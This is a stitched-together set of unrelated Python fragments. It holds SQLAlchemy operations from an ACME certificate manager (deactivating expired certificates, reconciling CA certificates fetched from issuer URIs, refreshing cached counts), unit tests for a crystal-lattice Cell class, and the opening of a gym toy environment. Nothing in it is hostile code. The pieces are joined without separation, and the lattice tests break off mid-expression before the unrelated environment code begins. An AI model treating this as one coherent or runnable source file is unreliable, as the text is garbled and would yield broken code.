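    print(session.query(Widget.id).filter(Widget.size == biggest).all())  # [(3,)]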
def operations_deactivate_expired(ctx):
"""
deactivates expired Certificates automatically
:param ctx: (required) A :class:`lib.utils.ApiContext` instance
"""
# create an event first
event_payload_dict = lib.utils.new_event_payload_dict()
event_payload_dict["count_deactivated"] = 0
operationsEvent = log__OperationsEvent(
ctx,
model_utils.OperationsEventType.from_string(
"CertificateSigned__deactivate_expired"
),
event_payload_dict,
)
# update the recents, this will automatically create a subevent
# this is required, because the following logic depends upon every
# Domain record being hinted with the id(s) of the latest corresponding
# Certificate(s)
subevent = operations_update_recents__global(ctx) # noqa: F841
# Start the Deactivate Logic
# placeholder
deactivated_cert_ids = []
# Step 1: load all the Expired Certificates
# order them by newest-first
expired_certs = (
ctx.dbSession.query(model_objects.CertificateSigned)
.filter(
model_objects.CertificateSigned.is_active.is_(True),
model_objects.CertificateSigned.timestamp_not_after < ctx.timestamp,
)
.order_by(model_objects.CertificateSigned.timestamp_not_after.desc())
.all()
)
# Step 2: Analyze
for cert in expired_certs:
# the domains for each Certificate require a query
# Certificate > [[UniqueFQDNSet > UniqueFQDNSet2Domain]] > Domain
cert_domains = (
ctx.dbSession.query(model_objects.Domain)
.join(
model_objects.UniqueFQDNSet2Domain,
model_objects.Domain.id == model_objects.UniqueFQDNSet2Domain.domain_id,
isouter=True,
)
.join(
model_objects.CertificateSigned,
model_objects.UniqueFQDNSet2Domain.unique_fqdn_set_id
== model_objects.CertificateSigned.unique_fqdn_set_id,
isouter=True,
)
.filter(
model_objects.CertificateSigned.id == cert.id,
)
.all()
)
cert_ok = True
for cert_domain in cert_domains:
# if this Certificate is the latest Certificate for the domain, we can not turn it off
if cert.id in (
cert_domain.certificate_signed_id__latest_single,
cert_domain.certificate_signed_id__latest_multi,
):
cert_ok = False
if cert_ok:
deactivated_cert_ids.append(cert.id)
cert.is_active = False
ctx.dbSession.flush(objects=[cert])
events.Certificate_expired(ctx, cert)
# update the event
if len(deactivated_cert_ids):
event_payload_dict["count_deactivated"] = len(deactivated_cert_ids)
event_payload_dict["certificate_signed.ids"] = deactivated_cert_ids
operationsEvent.set_event_payload(event_payload_dict)
ctx.dbSession.flush(objects=[operationsEvent])
return operationsEvent
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
_header_2_format = {
"application/pkcs7-mime": "pkcs7",
"application/pkix-cert": "pkix-cert",
}
def operations_reconcile_cas(ctx):
"""
tries to reconcile CAs
:param ctx: (required) A :class:`lib.utils.ApiContext` instance
"""
dbCertificateCAs = (
ctx.dbSession.query(model_objects.CertificateCA)
.filter(
model_objects.CertificateCA.cert_issuer_uri.isnot(None),
model_objects.CertificateCA.cert_issuer__reconciled.isnot(True),
)
.all()
)
_certificate_ca_ids = []
for dbCertificateCA in dbCertificateCAs:
log.debug("Reconciling CA...")
_certificate_ca_ids.append(dbCertificateCA.id)
cert_issuer_uri = dbCertificateCA.cert_issuer_uri
log.debug(dbCertificateCA.cert_subject)
log.debug(cert_issuer_uri)
resp = requests.get(cert_issuer_uri)
if resp.status_code != 200:
raise ValueError("Could not load certificate")
content_type = resp.headers.get("content-type")
filetype = _header_2_format.get(content_type) if content_type else None
cert_pems = None
if filetype == "pkcs7":
cert_pems = lib.cert_utils.convert_pkcs7_to_pems(resp.content)
elif filetype == "pkix-cert":
cert_pem = lib.cert_utils.convert_der_to_pem(resp.content)
cert_pems = [
cert_pem,
]
else:
raise ValueError("Not Implemented: %s" % content_type)
for cert_pem in cert_pems:
cert_parsed = lib.cert_utils.parse_cert(cert_pem)
(
_dbCertificateCAReconciled,
_is_created,
) = getcreate.getcreate__CertificateCA__by_pem_text(ctx, cert_pem)
# mark the first item as reconciled
dbCertificateCA.cert_issuer__reconciled = True
if not dbCertificateCA.cert_issuer__certificate_ca_id:
dbCertificateCA.cert_issuer__certificate_ca_id = (
_dbCertificateCAReconciled.id
)
else:
raise ValueError("Not Implemented: multiple reconciles")
# mark the second item
reconciled_uris = _dbCertificateCAReconciled.reconciled_uris
reconciled_uris = reconciled_uris.split(" ") if reconciled_uris else []
if cert_issuer_uri not in reconciled_uris:
reconciled_uris.append(cert_issuer_uri)
reconciled_uris = " ".join(reconciled_uris)
_dbCertificateCAReconciled.reconciled_uris = reconciled_uris
dbCertificateCAReconciliation = model_objects.CertificateCAReconciliation()
dbCertificateCAReconciliation.timestamp_operation = ctx.timestamp
dbCertificateCAReconciliation.certificate_ca_id = dbCertificateCA.id
dbCertificateCAReconciliation.certificate_ca_id__issuer__reconciled = (
_dbCertificateCAReconciled.id
)
dbCertificateCAReconciliation.result = True
ctx.dbSession.add(dbCertificateCAReconciliation)
event_payload_dict = lib.utils.new_event_payload_dict()
event_payload_dict["certificate_ca.ids"] = _certificate_ca_ids
dbOperationsEvent = log__OperationsEvent(
ctx,
model_utils.OperationsEventType.from_string("operations__reconcile_cas"),
event_payload_dict,
)
return dbOperationsEvent
def operations_update_recents__domains(ctx, dbDomains=None, dbUniqueFQDNSets=None):
"""
updates A SINGLE dbDomain record with recent values
:param ctx: (required) A :class:`lib.utils.ApiContext` instance
:param dbDomains: (required) A list of :class:`model.objects.Domain` instances
:param dbUniqueFQDNSets: (optional) A list of :class:`model.objects.UniqueFQDNSet` instances
"""
# we need a list of domain ids
_domain_ids = [i.id for i in dbDomains] if dbDomains else []
_unique_fqdn_set_ids = [i.id for i in dbUniqueFQDNSets] if dbUniqueFQDNSets else []
domain_ids = set(_domain_ids)
if dbUniqueFQDNSets:
for _dbUniqueFQDNSet in dbUniqueFQDNSets:
for _domain in _dbUniqueFQDNSet.domains:
domain_ids.add(_domain.id)
domain_ids = list(domain_ids)
if not domain_ids:
raise ValueError("no Domains specified")
#
# Step1:
# Update the cached `certificate_signed_id__latest_single` data for each Domain
_q_sub = (
ctx.dbSession.query(model_objects.CertificateSigned.id)
.join(
model_objects.UniqueFQDNSet2Domain,
model_objects.CertificateSigned.unique_fqdn_set_id
== model_objects.UniqueFQDNSet2Domain.unique_fqdn_set_id,
)
.filter(
model_objects.CertificateSigned.is_active.is_(True),
model_objects.CertificateSigned.is_single_domain_cert.is_(True),
model_objects.UniqueFQDNSet2Domain.domain_id == model_objects.Domain.id,
model_objects.Domain.id.in_(domain_ids),
)
.order_by(model_objects.CertificateSigned.timestamp_not_after.desc())
.limit(1)
)
_q_sub = scalar_subquery(_q_sub)
ctx.dbSession.execute(
model_objects.Domain.__table__.update()
.values(certificate_signed_id__latest_single=_q_sub)
.where(model_objects.Domain.__table__.c.id.in_(domain_ids))
)
#
# Step2:
# Update the cached `certificate_signed_id__latest_multi` data for each Domain
_q_sub = (
ctx.dbSession.query(model_objects.CertificateSigned.id)
.join(
model_objects.UniqueFQDNSet2Domain,
model_objects.CertificateSigned.unique_fqdn_set_id
== model_objects.UniqueFQDNSet2Domain.unique_fqdn_set_id,
)
.filter(
model_objects.CertificateSigned.is_active.is_(True),
model_objects.CertificateSigned.is_single_domain_cert.is_(False),
model_objects.UniqueFQDNSet2Domain.domain_id == model_objects.Domain.id,
model_objects.Domain.id.in_(domain_ids),
)
.order_by(model_objects.CertificateSigned.timestamp_not_after.desc())
.limit(1)
)
_q_sub = scalar_subquery(_q_sub)
ctx.dbSession.execute(
model_objects.Domain.__table__.update()
.values(certificate_signed_id__latest_multi=_q_sub)
.where(model_objects.Domain.__table__.c.id.in_(domain_ids))
)
# bookkeeping, doing this will mark the session as changed!
event_payload_dict = lib.utils.new_event_payload_dict()
event_payload_dict["domain.ids"] = _domain_ids
event_payload_dict["unique_fqdn_set.ids"] = _unique_fqdn_set_ids
dbOperationsEvent = log__OperationsEvent(
ctx,
model_utils.OperationsEventType.from_string(
"operations__update_recents__domains"
),
event_payload_dict,
)
return dbOperationsEvent
def operations_update_recents__global(ctx):
"""
updates all the objects to their most-recent relations
:param ctx: (required) A :class:`lib.utils.ApiContext` instance
"""
#
# Step1:
# Update the cached `certificate_signed_id__latest_single` data for each Domain
# _t_domain = model_objects.Domain.__table__.alias('domain')
_q_sub = (
ctx.dbSession.query(model_objects.CertificateSigned.id)
.join(
model_objects.UniqueFQDNSet2Domain,
model_objects.CertificateSigned.unique_fqdn_set_id
== model_objects.UniqueFQDNSet2Domain.unique_fqdn_set_id,
)
.filter(
model_objects.CertificateSigned.is_active.is_(True),
model_objects.CertificateSigned.is_single_domain_cert.is_(True),
model_objects.UniqueFQDNSet2Domain.domain_id == model_objects.Domain.id,
)
.order_by(model_objects.CertificateSigned.timestamp_not_after.desc())
.limit(1)
)
_q_sub = scalar_subquery(_q_sub)
ctx.dbSession.execute(
model_objects.Domain.__table__.update().values(
certificate_signed_id__latest_single=_q_sub
)
)
#
# Step2:
# Update the cached `certificate_signed_id__latest_multi` data for each Domain
# _t_domain = model_objects.Domain.__table__.alias('domain')
_q_sub = (
ctx.dbSession.query(model_objects.CertificateSigned.id)
.join(
model_objects.UniqueFQDNSet2Domain,
model_objects.CertificateSigned.unique_fqdn_set_id
== model_objects.UniqueFQDNSet2Domain.unique_fqdn_set_id,
)
.filter(
model_objects.CertificateSigned.is_active.is_(True),
model_objects.CertificateSigned.is_single_domain_cert.is_(False),
model_objects.UniqueFQDNSet2Domain.domain_id == model_objects.Domain.id,
)
.order_by(model_objects.CertificateSigned.timestamp_not_after.desc())
.limit(1)
)
_q_sub = scalar_subquery(_q_sub)
ctx.dbSession.execute(
model_objects.Domain.__table__.update().values(
certificate_signed_id__latest_multi=_q_sub
)
)
#
# Step3:
# update the count of active cert for each CertificateCA
CertificateSigned1 = sqlalchemy.orm.aliased(model_objects.CertificateSigned)
CertificateSigned2 = sqlalchemy.orm.aliased(model_objects.CertificateSigned)
CertificateSignedChain1 = sqlalchemy.orm.aliased(
model_objects.CertificateSignedChain
)
CertificateSignedChain2 = sqlalchemy.orm.aliased(
model_objects.CertificateSignedChain
)
CertificateCAChain1 = sqlalchemy.orm.aliased(model_objects.CertificateCAChain)
CertificateCAChain2 = sqlalchemy.orm.aliased(model_objects.CertificateCAChain)
_q_sub = (
ctx.dbSession.query(sqlalchemy.func.count(model_objects.Domain.id))
.outerjoin(
CertificateSigned1,
model_objects.Domain.certificate_signed_id__latest_single
== CertificateSigned1.id,
)
.outerjoin(
CertificateSigned2,
model_objects.Domain.certificate_signed_id__latest_multi
== CertificateSigned2.id,
)
.outerjoin(
CertificateSignedChain1,
CertificateSigned1.id == CertificateSignedChain1.certificate_signed_id,
)
.outerjoin(
CertificateSignedChain2,
            CertificateSigned2.id == CertificateSignedChain2.certificate_signed_id,
)
.outerjoin(
CertificateCAChain1,
CertificateSignedChain1.certificate_ca_chain_id
== CertificateCAChain1.certificate_ca_0_id,
)
.outerjoin(
CertificateCAChain2,
            CertificateSignedChain2.certificate_ca_chain_id
== CertificateCAChain2.certificate_ca_0_id,
)
.filter(
sqlalchemy.or_(
model_objects.CertificateCA.id
== CertificateCAChain1.certificate_ca_0_id,
model_objects.CertificateCA.id
== CertificateCAChain2.certificate_ca_0_id,
)
)
)
_q_sub = scalar_subquery(_q_sub)
ctx.dbSession.execute(
model_objects.CertificateCA.__table__.update().values(
count_active_certificates=_q_sub
)
)
#
# Step4:
# update the count of certificates/orders for each PrivateKey
# this is done automatically, but a periodic update is a good idea
# 4.A - PrivateKey.count_acme_orders
_q_sub = ctx.dbSession.query(
sqlalchemy.func.count(model_objects.AcmeOrder.private_key_id),
).filter(
model_objects.AcmeOrder.private_key_id == model_objects.PrivateKey.id,
)
_q_sub = scalar_subquery(_q_sub)
ctx.dbSession.execute(
model_objects.PrivateKey.__table__.update().values(count_acme_orders=_q_sub)
)
# 4.b - PrivateKey.count_certificate_signeds
_q_sub = ctx.dbSession.query(
sqlalchemy.func.count(model_objects.CertificateSigned.private_key_id),
).filter(
model_objects.CertificateSigned.private_key_id == model_objects.PrivateKey.id,
)
_q_sub = scalar_subquery(_q_sub)
ctx.dbSession.execute(
model_objects.PrivateKey.__table__.update().values(
count_certificate_signeds=_q_sub
)
)
#
# Step5:
# update the counts for each AcmeAccount
# 5.a - AcmeAccount.count_acme_orders
_q_sub = ctx.dbSession.query(
sqlalchemy.func.count(model_objects.AcmeOrder.acme_account_id),
).filter(
model_objects.AcmeOrder.acme_account_id == model_objects.AcmeAccount.id,
)
_q_sub = scalar_subquery(_q_sub)
ctx.dbSession.execute(
model_objects.AcmeAccount.__table__.update().values(count_acme_orders=_q_sub)
)
# 5.b - AcmeAccount.count_certificate_signeds
_q_sub = ctx.dbSession.query(
sqlalchemy.func.count(model_objects.AcmeOrder.certificate_signed_id),
).filter(
model_objects.AcmeOrder.acme_account_id == model_objects.AcmeAccount.id,
model_objects.AcmeOrder.certificate_signed_id.is_not(None),
)
_q_sub = scalar_subquery(_q_sub)
ctx.dbSession.execute(
model_objects.AcmeAccount.__table__.update().values(
count_certificate_signeds=_q_sub
)
)
# TODO: should we do the timestamps?
"""
UPDATE acme_account SET timestamp_last_certificate_request = (
SELECT MAX(timestamp_created) FROM certificate_request
WHERE certificate_request.acme_account_id = acme_account.id);
UPDATE acme_account SET timestamp_last_certificate_issue = (
SELECT MAX(timestamp_created) FROM certificate_signed
WHERE certificate_signed.acme_account_id = acme_account.id);
UPDATE private_key SET timestamp_last_certificate_request = (
SELECT MAX(timestamp_created) FROM certificate_request
WHERE certificate_request.private_key_id = private_key.id);
UPDATE private_key SET timestamp_last_certificate_issue = (
SELECT MAX(timestamp_created) FROM certificate_signed
WHERE certificate_signed.private_key_id = private_key.id);
"""
# bookkeeping, doing this will mark the session as changed!
dbOperationsEvent = log__OperationsEvent(
ctx,
model_utils.OperationsEventType.from_string(
"operations__update_recents__global"
),
)
return dbOperationsEvent
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def api_domains__enable(ctx, domain_names):
"""
this is just a proxy around queue_domains__add
:param ctx: (required) A :class:`lib.utils.ApiContext` instance
:param domain_names: (required) a list of domain names
"""
# bookkeeping
event_payload_dict = lib.utils.new_event_payload_dict()
dbOperationsEvent = log__OperationsEvent(
ctx,
model_utils.OperationsEventType.from_string("ApiDomains__enable"),
event_payload_dict,
)
results = lib.db.queues.queue_domains__add(ctx, domain_names)
return results
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import unittest as ut
import numpy as np
from mykit.core.cell import (Cell, CellError, atoms_from_sym_nat, axis_list,
periodic_duplicates_in_cell, sym_nat_from_atoms)
from mykit.core.constants import ANG2AU, AU2ANG, PI
from mykit.core.utils import get_dirpath, get_matched_files
class simple_cubic_lattice(ut.TestCase):
_a = 5.0
_latt = [[_a, 0.0, 0.0],
[0.0, _a, 0.0],
[0.0, 0.0, _a]]
_atoms = ["C"]
_frac = 0.5
_pos = [[_frac, 0.0, 0.0]]
_cell = Cell(_latt, _atoms, _pos, unit="ang", coordSys="D")
def test_properties(self):
# unit
self.assertEqual(self._cell.unit, "ang")
# coordinate system
self.assertEqual(self._cell.coordSys, "D")
# real space vectors
self.assertTrue(np.array_equal(self._cell.a, self._latt))
self.assertAlmostEqual(pow(self._a, 3), self._cell.vol)
self.assertTrue(np.array_equal(self._cell.center, [0.5, 0.5, 0.5]))
self.assertTupleEqual(self._cell.lattConsts,
(self._a, self._a, self._a, 90.0, 90.0, 90.0))
# Reciprocal
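        # for a simple cubic lattice b_i = (2*pi/a) * e_i, i.e. latt / a**2 in units of 2*pi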
recpIn2Pi = np.array(self._latt, dtype=self._cell._dtype)/self._a**2
self.assertTrue(np.allclose(self._cell.bIn2Pi, recpIn2Pi))
self.assertTrue(np.allclose(self._cell.b, recpIn2Pi * 2.0 * PI))
self.assertTrue(np.allclose(self._cell.blen, (2.0*PI/self._a,)*3))
# atom types
self.assertEqual(1, self._cell.natoms)
self.assertListEqual(["C", ], self._cell.atomTypes)
self.assertDictEqual({0: "C"}, self._cell.typeMapping)
self.assertListEqual([0, ], self._cell.typeIndex)
def test_magic(self):
self.assertEqual(1, len(self._cell))
self.assertTupleEqual(tuple(self._pos[0]), tuple(self._cell[0]))
def test_coord_conv(self):
self.assertRaisesRegex(CellError,
"Only support \"D\" direct or fractional and \"C\" Cartisian coordinate.",
self._cell.__setattr__, "coordSys", 'unknown')
# direct2cart
self._cell.coordSys = 'C'
self.assertTupleEqual(
tuple(self._cell[0]), (self._frac * self._a, 0.0, 0.0))
self.assertEqual("C", self._cell.coordSys)
# cart2direct
self._cell.coordSys = 'D'
self.assertEqual(self._cell[0][0], self._frac)
self.assertEqual("D", self._cell.coordSys)
def test_unit_conv(self):
# ang2au
self._cell.unit = 'au'
_latt = self._cell.get_cell()[0]
if self._cell._dtype == 'float32':
self.assertAlmostEqual(_latt[0, 0], self._a * ANG2AU, places=5)
else:
self.assertAlmostEqual(_latt[0, 0], self._a * ANG2AU)
self._cell.coordSys = 'C'
# au2ang
self._cell.unit = 'ang'
self.assertAlmostEqual(self._a * self._frac, self._cell.pos[0, 0])
self._cell.coordSys = 'D'
_latt = self._cell.get_cell()[0]
self.assertEqual(_latt[0, 0], self._a)
def test_scale(self):
self.assertRaisesRegex(
CellError, "scale must be positive real", self._cell.scale, '2')
self.assertRaisesRegex(
CellError, "scale must be positive real", self._cell.scale, -2.0)
self._cell.scale(2)
self._cell.scale(0.5)
self.assertTrue(np.array_equal(self._cell.a, self._latt))
def test_spglib_input(self):
_ip = self._cell.get_spglib_input()
self.assertTupleEqual(
(self._cell.latt, self._cell.pos, self._cell.typeIndex), _ip)
class cell_raise(ut.TestCase):
def test_bad_cell(self):
_latt = [[5.0, 0.0, 0.0],
[0.0, 0.0, 5.0]]
_atoms = ["C"]
_pos = [[0.0, 0.0, 0.0]]
self.assertRaises(CellError, Cell, _latt, _atoms, _pos)
_latt = [[5.0, 0.0],
[0.0, 5.0, 0.0],
[0.0, 0.0, 5.0]]
self.assertRaises(CellError, Cell, _latt, _atoms, _pos)
def test_bad_atoms_pos(self):
_latt = [[5.0, 0.0, 0.0],
[0.0, 5.0, 0.0],
[0.0, 0.0, 5.0]]
_atoms = []
_pos = [[0.0, 0.0, 0.0]]
self.assertRaises(CellError, Cell, _latt, _atoms, _pos)
_atoms = ["C"]
_pos = [0.0, 0.0, 0.0]
self.assertRaises(CellError, Cell, _latt, _atoms, _pos)
_atoms = ["C"]
_pos = [[0.0, 0.0, 0.0], [0.1, 0.0, 0.0]]
self.assertRaises(CellError, Cell, _latt, _atoms, _pos)
_atoms = ["C", "C"]
_pos = [[0.0, 0.0, 0.0]]
self.assertRaises(CellError, Cell, _latt, _atoms, _pos)
class cell_factory_method(ut.TestCase):
    '''Test the class methods to generate commonly used lattice structures'''
def test_bravais_cubic(self):
_pc = Cell.bravais_cP("C", a=5.0, coordSys="D")
self.assertEqual(1, len(_pc))
self.assertEqual("D", _pc.coordSys)
_bcc = Cell.bravais_cI("C", a=5.0, primitive=False, unit="au")
self.assertEqual("au", _bcc.unit)
self.assertEqual(2, len(_bcc))
_fcc = Cell.bravais_cF("C", a=5.0, primitive=False)
self.assertEqual(4, len(_fcc))
# primitive cell
_pbcc = Cell.bravais_cI("C", a=5.0, primitive=True)
self.assertEqual(1, len(_pbcc))
self.assertAlmostEqual(5.0*np.sqrt(3.0)/2.0, _pbcc.alen[0])
_pfcc = Cell.bravais_cF("C", a=5.0, primitive=True)
self.assertEqual(1, len(_pfcc))
self.assertAlmostEqual(5.0*np.sqrt(0.5), _pfcc.alen[0])
def test_bravais_orth(self):
oP = Cell.bravais_oP("C", a=1.0, b=2.0, c=3.0)
self.assertEqual(len(oP), 1)
self.assertEqual(oP.vol, 6.0)
oI = Cell.bravais_oI("C")
self.assertEqual(len(oI), 2)
oF = Cell.bravais_oF("C")
self.assertEqual(len(oF), 4)
    def test_typical_systems(self):
# both conventional and primitive
for p in [True, False]:
Cell.diamond("C", primitive=p)
Cell.anatase("Ti", "O", primitive=p)
Cell.rutile("Ti", "O", primitive=p)
Cell.zincblende("Zn", "O", primitive=p)
# primitive only
Cell.perovskite("Ca", "Ti", "O")
Cell.wurtzite("Zn", "O")
Cell.pyrite()
Cell.marcasite()
def test_read_from_json(self):
import os
import tempfile
import json
self.assertRaisesRegex(CellError, "JSON file not found: None",
Cell.read_from_json, None)
self.assertRaisesRegex(CellError, "JSON file not found: /abcdefg.json",
Cell.read_from_json, "/abcdefg.json")
# raise for invalid json
_tf = tempfile.NamedTemporaryFile()
with open(_tf.name, 'w') as h:
json.dump({}, h)
self.assertRaisesRegex(CellError, "invalid JSON file for cell: {}".format(_tf.name),
Cell.read_from_json, _tf.name)
_dict = {"latt": [[5.0, 0.0, 0.0], [0.0, 5.0, 0.0], [0.0, 0.0, 5.0]]}
with open(_tf.name, 'w') as h:
json.dump(_dict, h)
self.assertRaisesRegex(CellError, "invalid JSON file for cell: {}. No {}".format(_tf.name, "atoms"),
Cell.read_from_json, _tf.name)
_dict = {
"latt": [[5.0, 0.0, 0.0], [0.0, 5.0, 0.0], [0.0, 0.0, 5.0]],
"atoms": ["C"],
}
with open(_tf.name, 'w') as h:
json.dump(_dict, h)
self.assertRaisesRegex(CellError, "invalid JSON file for cell: {}. No {}".format(_tf.name, "pos"),
Cell.read_from_json, _tf.name)
# JSON with factory key
_dict = {
"factory": "zincblende",
"atom1": "Zn",
"a": 8.0, "unit": "au",
}
with open(_tf.name, 'w') as h:
json.dump(_dict, h)
self.assertRaisesRegex(CellError, "Required key not found in JSON: atom2",
Cell.read_from_json, _tf.name)
# add atom2 and dump again
_dict["atom2"] = "O"
with open(_tf.name, 'w') as h:
json.dump(_dict, h)
_cell = Cell.read_from_json(_tf.name)
self.assertEqual(_cell.unit, 'au')
self.assertEqual(_cell.comment, "Zincblende ZnO")
self.assertAlmostEqual(512, _cell.vol)
_tf.close()
# test one file in testdata, Cell_1.json is tested here
_path = os.path.join(os.path.dirname(__file__),
'..', 'testdata', 'Cell_1.json')
_cell = Cell.read_from_json(_path)
self.assertEqual(_cell.unit, "ang")
self.assertEqual(_cell.coordSys, "D")
self.assertEqual(_cell.natoms, 2)
self.assertListEqual(_cell.atoms, ["C", "C"])
def test_read_from_cif(self):
dataDir = os.path.join(get_dirpath(__file__), '..', 'testdata')
for fn in os.listdir(dataDir):
if fn.endswith('.cif'):
cif = os.path.join(dataDir, fn)
Cell.read_from_cif(cif)
class cell_select_dynamics(ut.TestCase):
'''Test the functionality of selective dynamics
'''
def test_fix_all(self):
_c = Cell.bravais_cP("C")
self.assertFalse(_c.useSelDyn)
_c = Cell.bravais_cP("C", allRelax=False)
self.assertTrue(_c.useSelDyn)
self.assertListEqual([False, ]*3, _c.sdFlags(0))
_c = Cell.bravais_cI("C", allRelax=False, primitive=False)
self.assertTrue(_c.useSelDyn)
self.assertListEqual([[False, ]*3, ]*2, _c.sdFlags())
def test_relax_all(self):
_c = Cell.bravais_cI("C", allRelax=False, primitive=False,
selectDyn={1: [True, False, True]})
_c.relax_all()
self.assertListEqual(_c.sdFlags(1), [True, True, True])
self.assertFalse(_c.useSelDyn)
def test_fix_some(self):
_pc = Cell.bravais_cF("C", selectDyn={1: [False, True, True]})
self.assertListEqual([True, ]*3, _pc.sdFlags(0))
self.assertListEqual([False, True, True, ], _pc.sdFlags(1))
def test_fix_by_set_method(self):
_pc = Cell.bravais_cF("C")
_pc.set_fix(0, 1)
self.assertListEqual([False, False, False], _pc.sdFlags(0))
self.assertListEqual([False, False, False], _pc.sdFlags(1))
_pc.set_fix(2, axis=1)
self.assertListEqual([False, True, True], _pc.sdFlags(2))
_pc.set_fix(3, axis=[2, 3])
self.assertListEqual([True, False, False], _pc.sdFlags(3))
def test_relax_by_set_method(self):
_pc = Cell.bravais_cF("C", allRelax=False)
_pc.set_relax(0, 1)
self.assertListEqual([True, True, True], _pc.sdFlags(0))
self.assertListEqual([True, True, True], _pc.sdFlags(1))
_pc.set_relax(2, axis=1)
self.assertListEqual([True, False, False], _pc.sdFlags(2))
_pc.set_relax(3, axis=[2, 3])
self.assertListEqual([False, True, True], _pc.sdFlags(3))
class cell_sort(ut.TestCase):
'''Test the sorting functionality of Cell
'''
def test_direct_switch_cscl(self):
_latt = [[1.0, 0.0, 0.0],
[0.0, 1.0, 0.0],
[0.0, 0.0, 1.0]]
_atoms = ["Cl", "Cs"]
_pos = [[0.0, 0.0, 0.0], [0.5, 0.5, 0.5]]
# Cs atom is fixed
_fix = [False, False, False]
_cell = Cell(_latt, _atoms, _pos, selectDyn={1: _fix})
self.assertListEqual([0], _cell.get_sym_index("Cl"))
self.assertListEqual([0], _cell["Cl"])
self.assertListEqual([1], _cell.get_sym_index("Cs"))
self.assertListEqual([1], _cell["Cs"])
_cell._switch_two_atom_index(0, 1)
self.assertListEqual(_cell.atoms, ["Cs", "Cl"])
self.assertListEqual([0], _cell.get_sym_index("Cs"))
self.assertListEqual([1], _cell.get_sym_index("Cl"))
self.assertListEqual(_fix, _cell.sdFlags(0))
def test_sanitize_atoms_sic(self):
_latt = [[1.0, 0.0, 0.0],
[0.0, 1.0, 0.0],
[0.0, 0.0, 1.0]]
_atoms = ["Si", "C", "Si", "Si", "C", "C", "Si", "C"]
_pos = [[0.0, 0.0, 0.0], # Si
[0.25, 0.25, 0.25], # C
[0.0, 0.5, 0.5], # Si
[0.5, 0.0, 0.5], # Si
[0.25, 0.75, 0.75], # C
[0.75, 0.25, 0.75], # C
[0.5, 0.5, 0.0], # Si
[0.75, 0.75, 0.25]] # C
_posSanitied = [[0.0, 0.0, 0.0], # Si
[0.0, 0.5, 0.5], # Si
[0.5, 0.0, 0.5], # Si
[0.5, 0.5, 0.0], # Si
[0.25, 0.25, 0.25], # C
[0.25, 0.75, 0.75], # C
[0.75, 0.25, 0.75], # C
[0.75, 0.75, 0.25]] # C
SiC = Cell(_latt, _atoms, _pos,
selectDyn={2: [False, False, False]})
# _latt._sanitize_atoms()
self.assertListEqual(list(sorted(_atoms, reverse=True)),
SiC.atoms)
self.assertDictEqual({0: 'Si', 1: 'C'}, SiC.typeMapping)
self.assertTrue(np.array_equal(SiC.pos,
np.array(_posSanitied, dtype=SiC._dtype)))
self.assertListEqual([False, False, False], SiC.sdFlags(1))
def test_sort_pos_sic(self):
'''Test sorting atoms and their positions in SiC
'''
_latt = [[1.0, 0.0, 0.0],
[0.0, 1.0, 0.0],
[0.0, 0.0, 1.0]]
_atoms = ["Si", "Si", "Si", "Si", "C", "C", "C", "C"]
_pos = [[0.0, 0.0, 0.0], # Si
[0.0, 0.5, 0.5], # Si
[0.5, 0.0, 0.5], # Si
[0.5, 0.5, 0.0], # Si
[0.25, 0.25, 0.25], # C
[0.25, 0.75, 0.75], # C
[0.75, 0.25, 0.75], # C
[0.75, 0.75, 0.25]] # C
_posSorted = [0.5, 0.5, 0.0, 0.0, 0.75, 0.75, 0.25, 0.25]
_posSortedRev = [0.0, 0.0, 0.5, 0.5, 0.25, 0.25, 0.75, 0.75]
SiC = Cell(_latt, _atoms, _pos)
# no need to sanitize atoms
self.assertListEqual(_atoms, SiC.atoms)
self.assertDictEqual({0: 'Si', 1: 'C'}, SiC.typeMapping)
for _axis in range(3):
SiC.sort_pos(axis=_axis+1)
self.assertTrue(np.array_equal(np.array(_posSorted, dtype=SiC._dtype),
SiC.pos[:, _axis]))
SiC.sort_pos(axis=_axis+1, reverse=True)
self.assertTrue(np.array_equal(np.array(_posSortedRev, dtype=SiC._dtype),
SiC.pos[:, _axis]))
class test_cell_manipulation(ut.TestCase):
'''Test manipulation methods for lattice and atoms
'''
def test_add_atom_on_graphene(self):
'''Test adding atoms in a graphene cell
'''
a = 5.2
_latt = [[a/2, 0.0, 0.0],
[-a/2, a/2*np.sqrt(3.0), 0.0],
[0.0, 0.0, 15.0]]
_atoms = ["C", "C", ]
_pos = [[0.0, 0.0, 0.5],
[1.0/3, 2.0/3, 0.5], ]
gp = Cell(_latt, _atoms, _pos)
self.assertRaisesRegex(CellError,
r"Invalid coordinate: *",
gp.add_atom, "H", [0.2, 0.3])
self.assertRaisesRegex(CellError,
"atom should be string, received <class 'int'>",
gp.add_atom, 1, [0.2, 0.3, 0.4])
gp.fix_all()
gp.add_atom("H", [0.0, 0.0, 0.6], sdFlag=[False, False, True])
self.assertEqual(gp.natoms, 3)
self.assertListEqual(gp.atoms, ['C', 'C', 'H'])
self.assertDictEqual(gp.typeMapping, {0: 'C', 1: 'H'})
self.assertListEqual(gp.sdFlags(2), [False, False, True])
def test_atom_arrange_after_add_atom(self):
'''Test if the atoms are correctly rearranged
after adding new atom
'''
a = 2.0
_latt = [[a, 0.0, 0.0],
[0.0, a, 0.0],
[0.0, 0.0, a]]
_atoms = ["Na", "Cl", ]
        _pos = [[0.0,
import numpy as np
import gym, gym.spaces
import time
import os
from collections import OrderedDict
import yaml
EPS = 1e-5
def parse_config(config):
with open(config, 'r') as f:
        config_data = yaml.safe_load(f)
return config_data
class ToyEnv:
def __init__(self,
config_file,
should_normalize_observation=True,
automatic_reset=True,
visualize=False):
self.config = parse_config(config_file)
self.load_map()
# action_space
# base: stop(no-op), turn left, turn right, forward
# arm: stop(no-op), slide up, slide down
self.action_space = gym.spaces.MultiDiscrete([4, 3])
self.direction = {
0: np.array([0, 1]), # facing east
1: np.array([-1, 0]), # facing north
2: np.array([0, -1]), # facing west
3: np.array([1, 0]), # facing south
}
self.num_agent_orientation = len(self.direction)
# door state
self.door_pos = np.array([self.door_row, self.door_col])
self.door_min_state = 1
self.door_max_state = self.config.get('door_max_state', 1)
assert self.door_max_state >= 1, 'door_max_state has to be greater than 0'
# observation_space
self.outputs = self.config.get('outputs', ['global_map'])
self.local_map_range = self.config.get('local_map_range', 5)
assert self.local_map_range % 2 == 1, 'local_map_range has to be an odd number'
observation_space = OrderedDict()
observation_space_min_max = OrderedDict()
